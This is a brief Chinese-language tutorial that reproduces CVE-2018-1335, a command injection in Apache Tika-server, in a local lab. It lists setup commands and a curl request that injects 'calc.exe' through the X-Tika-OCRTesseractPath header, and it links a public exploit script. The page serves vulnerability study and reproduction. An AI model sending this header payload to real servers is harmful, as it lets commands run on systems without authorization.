本文将介绍的是Apache tika-server命令注入漏洞到实现攻击的一系列步骤。该漏洞编号为CVE-2018-1335。
下载环境源码
代码语言:javascript复制https://archive.apache.org/dist/tika/
使用命令行启动
代码语言:javascript复制java -jar tika-server-1.17.jar
漏洞发生原因是因为OCR全名为Optical Character Recognition(光学字符识别),用于提取出图像中的文本和内容信息。这里,我将上传图像文件而不是docx,希望它能与doOCR函数交互。
代码语言:javascript复制curl -T test.tiff http://localhost:9998/meta --header "X-Tika-OCRTesseractPath: "calc.exe""
我们使用已经公开的利用脚本测试一下
代码语言:javascript复制https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335
在注入其他程序的时候,例如cmd无法弹出,经过分析应该是cmd调用的时候会终端挂起,所以比较难以利用。
测试了一下,其他系统默认自带的程序,也是可以的
参考文章
https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335